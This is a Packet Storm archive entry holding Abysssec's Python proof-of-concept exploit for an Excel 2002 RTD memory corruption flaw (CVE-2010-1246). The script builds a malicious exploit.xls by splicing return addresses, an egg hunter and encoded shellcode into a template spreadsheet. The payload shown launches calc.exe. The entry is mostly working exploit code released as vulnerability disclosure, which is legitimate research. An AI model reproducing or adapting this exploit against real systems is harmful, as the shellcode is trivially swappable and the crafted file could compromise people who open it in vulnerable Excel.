Month Of Abysssec Undisclosed Bugs - Excel RTD Memory Corruption

2010-09-11T00:00:00
ID PACKETSTORM:93716
Type packetstorm
Reporter Abysssec
Modified 2010-09-11T00:00:00

Description

                                        
                                            `'''  
__ __ ____ _ _ ____   
| \/ |/ __ \ /\ | | | | _ \  
| \ / | | | | / \ | | | | |_) |  
| |\/| | | | |/ /\ \| | | | _ <  
| | | | |__| / ____ \ |__| | |_) |  
|_| |_|\____/_/ \_\____/|____/  
  
http://www.exploit-db.com/moaub-10-excel-rtd-memory-corruption/  
http://www.exploit-db.com/sploits/moaub-10-exploit.zip  
'''  
  
'''  
Title : Excel RTD Memory Corruption  
Version : Excel 2002 sp3  
Analysis : http://www.abysssec.com  
Vendor : http://www.microsoft.com  
Impact : Critical  
Contact : shahin [at] abysssec.com , info [at] abysssec.com  
Twitter : @abysssec  
CVE : CVE-2010-1246  
MOAUB Number : MOAUB_10_BA  
'''  
  
  
  
import sys  
  
def main():  
  
try:  
fdR = open('src.xls', 'rb+')  
strTotal = fdR.read()  
str1 = strTotal[:4509]  
str2 = strTotal[5013:15000]  
str3 = strTotal[15800:]  
  
eip = "\xAd\x57\x00\x30" # pop pop ret  
jmp = "\xF7\xC2\x03\x30" # call esp  
  
#Egg Hunter  
eggHunter = ""  
eggHunter += "\x90\x90\x90"  
eggHunter += "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x8A\xD8\x80\xFB\x05\x5A\x74\xEC\xB8\x63"  
eggHunter += "\x70\x74\x6e\x8B\xFA\xAF\x75\xE7\xAF\x75\xE4\xFF\xE7"   
  
# shellcode calc.exe  
shellcode = '\x63\x70\x74\x6e\x63\x70\x74\x6e\x90\x90\x90\x89\xE5\xD9\xEE\xD9\x75\xF4\x5E\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5A\x6A\x41\x58\x50\x30\x41\x30\x41\x6B\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4A\x49\x4B\x4C\x4B\x58\x51\x54\x43\x30\x43\x30\x45\x50\x4C\x4B\x51\x55\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x44\x38\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x44\x58\x4C\x4B\x51\x4F\x47\x50\x45\x51\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43\x31\x4A\x4E\x46\x51\x49\x50\x4A\x39\x4E\x4C\x4C\x44\x49\x50\x42\x54\x45\x57\x49\x51\x48\x4A\x44\x4D\x45\x51\x49\x52\x4A\x4B\x4B\x44\x47\x4B\x46\x34\x46\x44\x45\x54\x43\x45\x4A\x45\x4C\x4B\x51\x4F\x47\x54\x43\x31\x4A\x4B\x43\x56\x4C\x4B\x44\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x43\x31\x4A\x4B\x4C\x49\x51\x4C\x47\x54\x45\x54\x48\x43\x51\x4F\x46\x51\x4C\x36\x43\x50\x46\x36\x45\x34\x4C\x4B\x50\x46\x50\x30\x4C\x4B\x47\x30\x44\x4C\x4C\x4B\x44\x30\x45\x4C\x4E\x4D\x4C\x4B\x42\x48\x44\x48\x4D\x59\x4B\x48\x4B\x33\x49\x50\x43\x5A\x46\x30\x45\x38\x4C\x30\x4C\x4A\x45\x54\x51\x4F\x42\x48\x4D\x48\x4B\x4E\x4D\x5A\x44\x4E\x50\x57\x4B\x4F\x4A\x47\x43\x53\x47\x4A\x51\x4C\x50\x57\x51\x59\x50\x4E\x50\x44\x50\x4F\x46\x37\x50\x53\x51\x4C\x43\x43\x42\x59\x44\x33\x43\x44\x43\x55\x42\x4D\x50\x33\x50\x32\x51\x4C\x42\x43\x45\x31\x42\x4C\x42\x43\x46\x4E\x45\x35\x44\x38\x42\x45\x43\x30\x41\x41'  
  
if len(eggHunter) > 266:  
print "[*] Error : Shellcode length is long"  
return  
if len(eggHunter) <=266:  
dif =266 - len(eggHunter)  
while dif > 0 :  
eggHunter += '\x90'  
dif = dif - 1  
  
  
if len(shellcode) > 800:  
print "[*] Error : Shellcode length is long"  
return  
if len(shellcode) <= 800:  
dif = 800 - len(shellcode)  
while dif > 0 :  
shellcode += '\x90'  
dif = dif - 1  
  
fdW= open('exploit.xls', 'wb+')  
fdW.write(str1)  
fdW.write("\x41\x41\x41") # padding  
fdW.write(jmp)  
fdW.write(eggHunter)   
fdW.write("\xeb\x06\x41\x41")   
fdW.write(eip)  
fdW.write("\x81\xc4\x24\x16\x00\x00") # add esp,2016  
fdW.write("\xc3") #ret  
  
i = 0  
while i < 54 :  
fdW.write("\x41\x41\x41\x41") # padding  
i = i + 1  
  
fdW.write(str2)  
fdW.write(shellcode)  
fdW.write(str3)  
  
fdW.close()  
fdR.close()  
print '[-] Excel file generated'  
except IOError:  
print '[*] Error : An IO error has occurred'  
print '[-] Exiting ...'  
sys.exit(-1)  
  
if __name__ == '__main__':  
main()  
  
`